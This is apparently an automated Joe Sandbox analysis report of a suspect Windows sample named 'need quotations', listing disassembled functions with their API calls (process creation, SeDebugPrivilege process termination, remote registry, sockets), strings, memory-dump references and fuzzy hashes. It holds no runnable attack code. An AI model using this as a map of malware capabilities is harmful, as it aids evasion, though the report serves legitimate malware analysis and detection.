Instruction Fuzzy Hash: E4419DB1510209BFEF02AF90DC89FBB77ACFF09304F00412AFA059A141D7B099668BA4

Function 0029B644 Relevance: 13.9, APIs: 9, Instructions: 432COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,?,002DDC00), ref: 0029B715
FreeLibrary.KERNEL32(00000000,00000001,00000000,?,002DDC00), ref: 0029B749
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 0029B8C1
SysFreeString.OLEAUT32(?), ref: 0029B8EB

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: Free$FileLibraryModuleNamePathQueryStringType
String ID:
API String ID: 560350794-0
Opcode ID: 0bb329e78c26a3b729f6fcdd3ddcccf6d1931c161be08bc102e3a6ec2812030b
Instruction ID: 1d14ced07dc143a971d5159b79c03f9d2afe9b16350cfcf9224b703c74aeecd0
Opcode Fuzzy Hash: 0bb329e78c26a3b729f6fcdd3ddcccf6d1931c161be08bc102e3a6ec2812030b
Instruction Fuzzy Hash: 6CF14875A20209EFDF05DF94D988EAEB7B9FF89311F108058F905AB250DB71AE51CB90

Function 002A24D4 Relevance: 13.9, APIs: 9, Instructions: 376processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 002A24F5
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 002A2688
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 002A26AC
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 002A26EC
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 002A270E
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 002A286F
GetLastError.KERNEL32(00000000,00000001,00000000), ref: 002A28A1
CloseHandle.KERNEL32(?), ref: 002A28D0
CloseHandle.KERNEL32(?), ref: 002A2947

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
String ID:
API String ID: 4090791747-0
Opcode ID: 05ffa7bc65a163b2899faebb19c58b62651ffb784938b33859763f63a3528b96
Instruction ID: 9e742eeae81c91b575339dff3b280418c506b0145aa9a7a6d60cf89440ed491e
Opcode Fuzzy Hash: 05ffa7bc65a163b2899faebb19c58b62651ffb784938b33859763f63a3528b96
Instruction Fuzzy Hash: 48D1A131624301DFC718EF28C891A6ABBE5BF85710F14856DF8899B2A2DB31DD58CF52

Function 002AB33A Relevance: 13.7, APIs: 9, Instructions: 167COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 002AB3F4

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 74f70b4581c83e5b492648fa1b7dd8cee55973ebe5784ae9364b73dc8576f697
Instruction ID: 7741ada04ef92cc87401a4ce6448eee4c8ac99da59593ee861142e7cf7970b8f
Opcode Fuzzy Hash: 74f70b4581c83e5b492648fa1b7dd8cee55973ebe5784ae9364b73dc8576f697
Instruction Fuzzy Hash: 8F51A130920205BFEF229F28DC99FAD7B68AB06314F644156FA15D61E3CFB1E960CB50

Function 0025A699 Relevance: 13.7, APIs: 9, Instructions: 163windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 002BDB1B
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 002BDB3C
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 002BDB51
ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 002BDB6E
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 002BDB95
DestroyIcon.USER32(00000000,?,?,?,?,?,?,0025A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 002BDBA0
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 002BDBBD
DestroyIcon.USER32(00000000,?,?,?,?,?,?,0025A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 002BDBC8

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend
String ID:
API String ID: 1268354404-0
Opcode ID: b91dd7224e642911bbdc92b599200681ae2df30206ff856d58deb6bb77f63e02
Instruction ID: 94f3daffde7678df3c92519682be7d97b6fcf1a561bf493be59d75c304b61ea9
Opcode Fuzzy Hash: b91dd7224e642911bbdc92b599200681ae2df30206ff856d58deb6bb77f63e02
Instruction Fuzzy Hash: 68518D70620209EFDB24DF24CC96FAA77B8BB08755F100629F946972D0D7B0EDA4DB54

Function 00287555 Relevance: 13.6, APIs: 9, Instructions: 142filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00286EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00285FA6,?), ref: 00286ED8

Part of subcall function 00286EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00285FA6,?), ref: 00286EF1

Part of subcall function 002872CB: GetFileAttributesW.KERNEL32(?,00286019), ref: 002872CC

lstrcmpiW.KERNEL32(?,?), ref: 002875CA
_wcscmp.LIBCMT ref: 002875E2
MoveFileW.KERNEL32(?,?), ref: 002875FB

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
String ID:
API String ID: 793581249-0
Opcode ID: d7dad36c913feb10b77da2b89762281d7b6c57dadf944e12b80e0fb3bacb80d5
Instruction ID: ba5ec006cde6ea439b1e0882b808722275e16003f47de16d9e70c96ddcb34a14
Opcode Fuzzy Hash: d7dad36c913feb10b77da2b89762281d7b6c57dadf944e12b80e0fb3bacb80d5
Instruction Fuzzy Hash: 1F5120B6A1A2295ADF50FB94D885DDE73BCAF08310B5040AAFA05E3181EA74D7D5CF60

Function 0025EA69 Relevance: 13.6, APIs: 9, Instructions: 135COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,002BDAD1,00000004,00000000,00000000), ref: 0025EAEB
ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,002BDAD1,00000004,00000000,00000000), ref: 0025EB32
ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,002BDAD1,00000004,00000000,00000000), ref: 002BDC86
ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,002BDAD1,00000004,00000000,00000000), ref: 002BDCF2

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 01ee7a9bff35c716c3271c6768f8cfc50bb6e56b181beee3feb8be7a272a5f6e
Instruction ID: ddbd08446e3b8073c1eeda2b3cc1ba44661ed7709472cd50f8610b544cb43278
Opcode Fuzzy Hash: 01ee7a9bff35c716c3271c6768f8cfc50bb6e56b181beee3feb8be7a272a5f6e
Instruction Fuzzy Hash: 4C411930235641DBCF3D4F389D8DAB67E9ABB4130BF1B041EE88742561D6B17A68C718

Function 0027B263 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0027AEF1,00000B00,?,?), ref: 0027B26C
HeapAlloc.KERNEL32(00000000,?,0027AEF1,00000B00,?,?), ref: 0027B273
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0027AEF1,00000B00,?,?), ref: 0027B288
GetCurrentProcess.KERNEL32(?,00000000,?,0027AEF1,00000B00,?,?), ref: 0027B290
DuplicateHandle.KERNEL32(00000000,?,0027AEF1,00000B00,?,?), ref: 0027B293
GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0027AEF1,00000B00,?,?), ref: 0027B2A3
GetCurrentProcess.KERNEL32(0027AEF1,00000000,?,0027AEF1,00000B00,?,?), ref: 0027B2AB
DuplicateHandle.KERNEL32(00000000,?,0027AEF1,00000B00,?,?), ref: 0027B2AE
CreateThread.KERNEL32(00000000,00000000,0027B2D4,00000000,00000000,00000000), ref: 0027B2C8

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: ba7cf9714007afdec3fb566e3ca6e150c7826e3ce59d28e7a91185ccdaa42e01
Instruction ID: 1e6808c534102592b13d98b3cf171674f47e0f5bc55bfc566267d380a11ecf59
Opcode Fuzzy Hash: ba7cf9714007afdec3fb566e3ca6e150c7826e3ce59d28e7a91185ccdaa42e01
Instruction Fuzzy Hash: 3001CDB5240344BFE710AFA5EC4DF6B7BACEB89711F018465FA09DB1A1CAB49801CF61

Function 0029C43F Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 401COMMON

Download Yara Rule

Strings

Not an Object type, xrefs: 0029C49E
NULL Pointer assignment, xrefs: 0029C876, 0029C887

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: 185f13071bae868dcbeb1343a3ae9e8eac0ee9e7320e064a7cd123ceb8fec3c4
Instruction ID: deeb204550d824af4578773795c6428bce1cc356fc5e1234cbd9690ffbcb36ea
Opcode Fuzzy Hash: 185f13071bae868dcbeb1343a3ae9e8eac0ee9e7320e064a7cd123ceb8fec3c4
Instruction Fuzzy Hash: E7E1C771A2021AAFDF14DFA4C885AEEB7B9FF48354F244029F905A7281D770AD61CF90

Function 002916DA Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 309COMMON

Download Yara Rule

APIs

Part of subcall function 0024936C: __swprintf.LIBCMT ref: 002493AB
Part of subcall function 0024936C: __itow.LIBCMT ref: 002493DF

Part of subcall function 0025C6F4: _wcscpy.LIBCMT ref: 0025C717

_wcstok.LIBCMT ref: 0029184E
_wcscpy.LIBCMT ref: 002918DD
_memset.LIBCMT ref: 00291910

Strings

p2/l2/, xrefs: 00291920
X, xrefs: 00291948

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: _wcscpy$__itow__swprintf_memset_wcstok
String ID: X$p2/l2/
API String ID: 774024439-4159514806
Opcode ID: 4944236651e65fde58c2f137e4ea20d37c03048f7ce67db5d984393ae8b24478
Instruction ID: fb33f2ef9f39fb9eafbee9f290d3a355a2f6f6e2523189e933497cf5c53c3a8f
Opcode Fuzzy Hash: 4944236651e65fde58c2f137e4ea20d37c03048f7ce67db5d984393ae8b24478
Instruction Fuzzy Hash: 0EC191305243419FD728EF24C881A6AB7E4FF85354F10492DF989972A2DB70ED65CF82

Function 002A9A75 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 142windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 002A9B19
SendMessageW.USER32(?,00001036,00000000,?), ref: 002A9B2D
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 002A9B47
_wcscat.LIBCMT ref: 002A9BA2
SendMessageW.USER32(?,00001057,00000000,?), ref: 002A9BB9
SendMessageW.USER32(?,00001061,?,0000000F), ref: 002A9BE7

Strings

SysListView32, xrefs: 002A9AEB

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: MessageSend$Window_wcscat
String ID: SysListView32
API String ID: 307300125-78025650
Opcode ID: 7038d2632d47237f2f85d34bc8154f08d3558f30e7433b228cce57febf97c518
Instruction ID: 78975ffbd8e923bd164ef0989d73c5bcfaffe657e1522a774a743f6a63cdd363
Opcode Fuzzy Hash: 7038d2632d47237f2f85d34bc8154f08d3558f30e7433b228cce57febf97c518
Instruction Fuzzy Hash: 5741B271910309ABDB21DF64DC85FEE77A8EF09354F10482AF645E7291CA719D94CB60

Function 002A172F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135COMMON

Download Yara Rule

APIs

Part of subcall function 00286532: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00286554
Part of subcall function 00286532: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00286564
Part of subcall function 00286532: CloseHandle.KERNEL32(00000000,?,00000000), ref: 002865F9

OpenProcess.KERNEL32(00000001,00000000,?), ref: 002A179A
GetLastError.KERNEL32 ref: 002A17AD
OpenProcess.KERNEL32(00000001,00000000,?), ref: 002A17D9
TerminateProcess.KERNEL32(00000000,00000000), ref: 002A1855
GetLastError.KERNEL32(00000000), ref: 002A1860
CloseHandle.KERNEL32(00000000), ref: 002A1895

Strings

SeDebugPrivilege, xrefs: 002A17B8

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: e1156147b870c435ea7e3aed46ec365fc8d9bd5aa219b1aa6a05d379f23d8f58
Instruction ID: 4d091a02eb0e04cbc9ac77a68a03e1c80b37ed09411775faac80fa6414931397
Opcode Fuzzy Hash: e1156147b870c435ea7e3aed46ec365fc8d9bd5aa219b1aa6a05d379f23d8f58
Instruction Fuzzy Hash: 7E41EF71620201AFEB05EF54CC95F6DB7A1AF15711F088099FA069F2C2DFB8A9248F91

Function 00285819 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 002858B8

Strings

blank, xrefs: 0028583A
warning, xrefs: 002858A1
question, xrefs: 00285871
stop, xrefs: 00285889
info, xrefs: 00285859

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: 9dbce832a0308be86eef48e9bde6e6a3d43e06261b0a6d7eb8c7cef37dd434dc
Instruction ID: 129a40bf64a523424e27ec9574317985580d6194cef348cb3223dcaa8b6a4a9e
Opcode Fuzzy Hash: 9dbce832a0308be86eef48e9bde6e6a3d43e06261b0a6d7eb8c7cef37dd434dc
Instruction Fuzzy Hash: 0D113D3A23AB57FAE7016F559C82D6B739C9F15350B20003BF600E62C1E7B0AAB05769

Function 0028A729 Relevance: 12.3, APIs: 8, Instructions: 317COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 0028A806

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: ArraySafeVartype
String ID:
API String ID: 1725837607-0
Opcode ID: 726ba6fcfcb56ab14506c7a1932f99376513c40f669c8e510f85668cf4fd13e9
Instruction ID: 765eee7cf369235e0ac2d5f5380d1530a81c32d2aad47661c0e53e5bce9d13fc
Opcode Fuzzy Hash: 726ba6fcfcb56ab14506c7a1932f99376513c40f669c8e510f85668cf4fd13e9
Instruction Fuzzy Hash: A6C1D17991620ADFEB04EF98C481BAEB7F4FF08315F24406AE605E7281DB74A951CF91

Function 00286B49 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00286B63
LoadStringW.USER32(00000000), ref: 00286B6A
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00286B80
LoadStringW.USER32(00000000), ref: 00286B87
_wprintf.LIBCMT ref: 00286BAD
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00286BCB

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00286BA8

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wprintf
String ID: %s (%d) : ==> %s: %s %s
API String ID: 3648134473-3128320259
Opcode ID: 7636b48a7c4e0431163224894ddb8e493f02c6d419897fed5c821dfe4c3255be
Instruction ID: e625916c92c5f3e560db4feb8ea40d0781ddb1c4a36b512b3570566d0b590746
Opcode Fuzzy Hash: 7636b48a7c4e0431163224894ddb8e493f02c6d419897fed5c821dfe4c3255be
Instruction Fuzzy Hash: DA0136F65502487FE711ABA4AD8DEF7776CD704344F4044A1B749E2041EA74DE958F70

Function 002A2B19 Relevance: 12.3, APIs: 8, Instructions: 251registryCOMMON

Download Yara Rule

APIs

Part of subcall function 002A3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,002A2BB5,?,?), ref: 002A3C1D

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 002A2BF6

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: BuffCharConnectRegistryUpper
String ID:
API String ID: 2595220575-0
Opcode ID: cefb0b2f10eb7d2348bc10e927ad30f06fd304f1b8667a62110b65493cfe33e1
Instruction ID: 6fc1b5d2029ad33987f55560c1d51fa51a550f19bed57f962ad3e039f680b9be
Opcode Fuzzy Hash: cefb0b2f10eb7d2348bc10e927ad30f06fd304f1b8667a62110b65493cfe33e1
Instruction Fuzzy Hash: 12915871214201DFCB04EF58C885B6EB7E5BF89310F14885DF9969B2A2DB70E929CF42

Function 0029961C Relevance: 12.2, APIs: 8, Instructions: 220networkCOMMON

Download Yara Rule

APIs

select.WSOCK32 ref: 00299691
WSAGetLastError.WSOCK32(00000000), ref: 0029969E
__WSAFDIsSet.WSOCK32(00000000,?,00000000), ref: 002996C8
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 002996E9
WSAGetLastError.WSOCK32(00000000), ref: 002996F8
inet_ntoa.WSOCK32(?), ref: 00299765
htons.WSOCK32(?,?,?,00000000,?), ref: 002997AA

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: ErrorLast$htonsinet_ntoaselect
String ID:
API String ID: 500251541-0
Opcode ID: 326b7d4b8fe8c454a12d27e5cc10b37675e035dd0bf5744b24223bcbbe66d0eb
Instruction ID: 5a5e950d19758b6da822b1c4050b084694644ad89061822b3fe52493c06d57c0
Opcode Fuzzy Hash: 326b7d4b8fe8c454a12d27e5cc10b37675e035dd0bf5744b24223bcbbe66d0eb
Instruction Fuzzy Hash: 6171FD31024200ABC714EF68CC85F6BB7E8FF85724F104A2DF9559B1A1EB70D928CB62

Function 0026A979 Relevance: 12.1, APIs: 8, Instructions: 118COMMONLIBRARYCODE

Download Yara Rule

APIs

__mtinitlocknum.LIBCMT ref: 0026A991

Part of subcall function 00267D7C: __FF_MSGBANNER.LIBCMT ref: 00267D91
Part of subcall function 00267D7C: __NMSG_WRITE.LIBCMT ref: 00267D98
Part of subcall function 00267D7C: __malloc_crt.LIBCMT ref: 00267DB8

__lock.LIBCMT ref: 0026A9A4
__lock.LIBCMT ref: 0026A9F0
InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,002F6DE0,00000018,00275E7B,?,00000000,00000109), ref: 0026AA0C
EnterCriticalSection.KERNEL32(8000000C,002F6DE0,00000018,00275E7B,?,00000000,00000109), ref: 0026AA29
